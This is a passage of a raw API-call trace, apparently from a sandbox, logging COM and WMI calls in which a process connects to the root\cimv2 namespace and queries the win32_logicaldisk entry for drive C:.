[7]=0x25)), ppvObject=0x691f2ac | out: ppvObject=0x691f2ac*=0x0) returned 0x80004002 [0209.456] IUnknown:Release (This=0xb51e34) returned 0x1 [0209.456] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ec18 | out: ppv=0x691ec18*=0x6027260) returned 0x0 [0209.456] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027260, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ee30 | out: ppvObject=0x691ee30*=0x0) returned 0x80004002 [0209.457] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027260, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ee44 | out: ppvObject=0x691ee44*=0x60313c0) returned 0x0 [0209.457] WbemDefPath:IUnknown:Release (This=0x6027260) returned 0x0 [0209.457] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea64 | out: ppvObject=0x691ea64*=0x60313c0) returned 0x0 [0209.457] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ea20 | out: ppvObject=0x691ea20*=0x0) returned 0x80004002 [0209.457] WbemDefPath:IUnknown:AddRef (This=0x60313c0) returned 0x3 [0209.457] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e37c | out: ppvObject=0x691e37c*=0x0) returned 0x80004002 [0209.457] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e32c | out: ppvObject=0x691e32c*=0x0) returned 0x80004002 [0209.457] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e338 | out: ppvObject=0x691e338*=0xbdf1f0) returned 0x0 [0209.457] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf1f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e340 | out: pCid=0x691e340*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.457] WbemDefPath:IUnknown:Release (This=0xbdf1f0) returned 0x3 [0209.457] CoGetContextToken (in: pToken=0x691e398 | out: pToken=0x691e398) returned 0x0 [0209.457] CoGetContextToken (in: pToken=0x691e7a0 | out: pToken=0x691e7a0) returned 0x0 [0209.457] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e830 | out: ppvObject=0x691e830*=0x0) returned 0x80004002 [0209.458] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x2 [0209.458] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x1 [0209.458] CoGetContextToken (in: pToken=0x691f128 | out: pToken=0x691f128) returned 0x0 [0209.458] CoGetContextToken (in: pToken=0x691f088 | out: pToken=0x691f088) returned 0x0 [0209.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x691f158*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f154 | out: ppvObject=0x691f154*=0x60313c0) returned 0x0 [0209.458] WbemDefPath:IUnknown:AddRef (This=0x60313c0) returned 0x3 [0209.458] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x2 [0209.458] WbemDefPath:IWbemPath:SetText (This=0x60313c0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.458] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0209.458] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f2d8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d8*=0x20, pszText=0x0) returned 0x0 [0209.458] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f2d8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.458] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0209.458] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0209.458] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0209.458] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0209.458] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x691f25c | out: puCount=0x691f25c*=0x0) returned 0x0 [0209.458] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x691f248 | out: puCount=0x691f248*=0x2) returned 0x0 [0209.458] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0x0, pszText=0x0 | out: puBuffLength=0x691f244*=0xf, pszText=0x0) returned 0x0 [0209.458] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f244*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.458] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f1f8 | out: ppv=0x691f1f8*=0xb51e34) returned 0x0 [0209.458] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f1f0 | out: pAptType=0x691f1f0*=1) returned 0x0 [0209.458] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f1f4 | out: ppvObject=0x691f1f4*=0x0) returned 0x80004002 [0209.458] IUnknown:Release (This=0xb51e34) returned 0x1 [0209.459] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691eb60 | out: ppv=0x691eb60*=0x6027280) returned 0x0 [0209.459] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027280, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ed78 | out: ppvObject=0x691ed78*=0x0) returned 0x80004002 [0209.459] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027280, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ed8c | out: ppvObject=0x691ed8c*=0x6031430) returned 0x0 [0209.459] WbemDefPath:IUnknown:Release (This=0x6027280) returned 0x0 [0209.459] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9ac | out: ppvObject=0x691e9ac*=0x6031430) returned 0x0 [0209.459] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691e968 | out: ppvObject=0x691e968*=0x0) returned 0x80004002 [0209.459] WbemDefPath:IUnknown:AddRef (This=0x6031430) returned 0x3 [0209.459] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e2c4 | out: ppvObject=0x691e2c4*=0x0) returned 0x80004002 [0209.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e274 | out: ppvObject=0x691e274*=0x0) returned 0x80004002 [0209.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e280 | out: ppvObject=0x691e280*=0xbdef30) returned 0x0 [0209.460] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdef30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e288 | out: pCid=0x691e288*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.460] WbemDefPath:IUnknown:Release (This=0xbdef30) returned 0x3 [0209.460] CoGetContextToken (in: pToken=0x691e2e0 | out: pToken=0x691e2e0) returned 0x0 [0209.460] CoGetContextToken (in: pToken=0x691e6e8 | out: pToken=0x691e6e8) returned 0x0 [0209.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e778 | out: ppvObject=0x691e778*=0x0) returned 0x80004002 [0209.460] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x2 [0209.460] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x1 [0209.460] CoGetContextToken (in: pToken=0x691f070 | out: pToken=0x691f070) returned 0x0 [0209.460] CoGetContextToken (in: pToken=0x691efd0 | out: pToken=0x691efd0) returned 0x0 [0209.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x691f0a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f09c | out: ppvObject=0x691f09c*=0x6031430) returned 0x0 [0209.460] WbemDefPath:IUnknown:AddRef (This=0x6031430) returned 0x3 [0209.460] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x2 [0209.460] WbemDefPath:IWbemPath:SetText (This=0x6031430, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0209.460] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x691f220 | out: puCount=0x691f220*=0x2) returned 0x0 [0209.460] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x691f21c*=0x0, pszText=0x0 | out: puBuffLength=0x691f21c*=0xf, pszText=0x0) returned 0x0 [0209.460] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x691f21c*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f21c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.460] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f220 | out: ppv=0x691f220*=0xb51e34) returned 0x0 [0209.460] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f218 | out: pAptType=0x691f218*=1) returned 0x0 [0209.460] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f21c | out: ppvObject=0x691f21c*=0x0) returned 0x80004002 [0209.460] IUnknown:Release (This=0xb51e34) returned 0x1 [0209.461] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ee40 | out: ppv=0x691ee40*=0x6024890) returned 0x0 [0209.461] WbemLocator:IUnknown:QueryInterface (in: This=0x6024890, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691f058 | out: ppvObject=0x691f058*=0x0) returned 0x80004002 [0209.461] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024890, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f06c | out: ppvObject=0x691f06c*=0x6027290) returned 0x0 [0209.461] WbemLocator:IUnknown:Release (This=0x6024890) returned 0x0 [0209.461] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ec8c | out: ppvObject=0x691ec8c*=0x6027290) returned 0x0 [0209.461] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ec48 | out: ppvObject=0x691ec48*=0x0) returned 0x80004002 [0209.461] WbemLocator:IUnknown:AddRef (This=0x6027290) returned 0x3 [0209.461] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e5a4 | out: ppvObject=0x691e5a4*=0x0) returned 0x80004002 [0209.461] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e554 | out: ppvObject=0x691e554*=0x0) returned 0x80004002 [0209.461] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e560 | out: ppvObject=0x691e560*=0x0) returned 0x80004002 [0209.461] CoGetContextToken (in: pToken=0x691e5c0 | out: pToken=0x691e5c0) returned 0x0 [0209.462] CoGetContextToken (in: pToken=0x691e9c8 | out: pToken=0x691e9c8) returned 0x0 [0209.462] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea58 | out: ppvObject=0x691ea58*=0x0) returned 0x80004002 [0209.462] WbemLocator:IUnknown:Release (This=0x6027290) returned 0x2 [0209.462] WbemLocator:IUnknown:Release (This=0x6027290) returned 0x1 [0209.462] CoGetContextToken (in: pToken=0x691f038 | out: pToken=0x691f038) returned 0x0 [0209.462] CoGetContextToken (in: pToken=0x691ef98 | out: pToken=0x691ef98) returned 0x0 [0209.462] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x691f068*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x691f064 | out: ppvObject=0x691f064*=0x6027290) returned 0x0 [0209.462] WbemLocator:IUnknown:AddRef (This=0x6027290) returned 0x3 [0209.462] WbemLocator:IUnknown:Release (This=0x6027290) returned 0x2 [0209.462] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x691f1fc | out: puCount=0x691f1fc*=0x2) returned 0x0 [0209.462] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=8, puBuffLength=0x691f1f8*=0x0, pszText=0x0 | out: puBuffLength=0x691f1f8*=0xf, pszText=0x0) returned 0x0 [0209.462] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=8, puBuffLength=0x691f1f8*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1f8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.462] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x691f0d4 | out: ppv=0x691f0d4*=0x60271c0) returned 0x0 [0209.462] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60271c0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x691f168 | out: ppNamespace=0x691f168*=0x603373c) returned 0x0 [0210.081] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f004 | out: ppvObject=0x691f004*=0xb5ac84) returned 0x0 [0210.082] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ac84, pProxy=0x603373c, pAuthnSvc=0x691f054, pAuthzSvc=0x691f050, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c, pImpLevel=0x691f03c, pAuthInfo=0x691f040, pCapabilites=0x691f044 | out: pAuthnSvc=0x691f054*=0xa, pAuthzSvc=0x691f050*=0x0, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c*=0x6, pImpLevel=0x691f03c*=0x2, pAuthInfo=0x691f040, pCapabilites=0x691f044*=0x1) returned 0x0 [0210.082] WbemLocator:IUnknown:Release (This=0xb5ac84) returned 0x1 [0210.082] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff8 | out: ppvObject=0x691eff8*=0xb5aca4) returned 0x0 [0210.082] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff4 | out: ppvObject=0x691eff4*=0xb5ac84) returned 0x0 [0210.082] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ac84, pProxy=0x603373c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0210.082] WbemLocator:IUnknown:Release (This=0xb5ac84) returned 0x2 [0210.082] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x1 [0210.082] CoTaskMemFree (pv=0xbd4a38) [0210.082] WbemLocator:IUnknown:Release (This=0x60271c0) returned 0x0 [0210.082] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ebf4 | out: ppvObject=0x691ebf4*=0xb5aca4) returned 0x0 [0210.082] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ebb0 | out: ppvObject=0x691ebb0*=0x0) returned 0x80004002 [0210.083] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691e9cc | out: ppvObject=0x691e9cc*=0x0) returned 0x80004002 [0210.083] WbemLocator:IUnknown:AddRef (This=0xb5aca4) returned 0x3 [0210.083] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e50c | out: ppvObject=0x691e50c*=0x0) returned 0x80004002 [0210.083] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e4bc | out: ppvObject=0x691e4bc*=0x0) returned 0x80004002 [0210.084] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e4c8 | out: ppvObject=0x691e4c8*=0xb5ac04) returned 0x0 [0210.084] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5ac04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e4d0 | out: pCid=0x691e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0210.084] WbemLocator:IUnknown:Release (This=0xb5ac04) returned 0x3 [0210.084] CoGetContextToken (in: pToken=0x691e528 | out: pToken=0x691e528) returned 0x0 [0210.084] CoGetContextToken (in: pToken=0x691e930 | out: pToken=0x691e930) returned 0x0 [0210.084] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9c0 | out: ppvObject=0x691e9c0*=0xb5ac8c) returned 0x0 [0210.084] WbemLocator:IRpcOptions:Query (in: This=0xb5ac8c, pPrx=0xb5aca4, dwProperty=2, pdwValue=0x691e9e8 | out: pdwValue=0x691e9e8) returned 0x80004002 [0210.084] WbemLocator:IUnknown:Release (This=0xb5ac8c) returned 0x3 [0210.084] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x2 [0210.084] CoGetContextToken (in: pToken=0x691ef08 | out: pToken=0x691ef08) returned 0x0 [0210.084] CoGetContextToken (in: pToken=0x691ee68 | out: pToken=0x691ee68) returned 0x0 [0210.084] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x691ef38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x691ef34 | out: ppvObject=0x691ef34*=0x603373c) returned 0x0 [0210.084] WbemLocator:IUnknown:AddRef (This=0x603373c) returned 0x4 [0210.084] 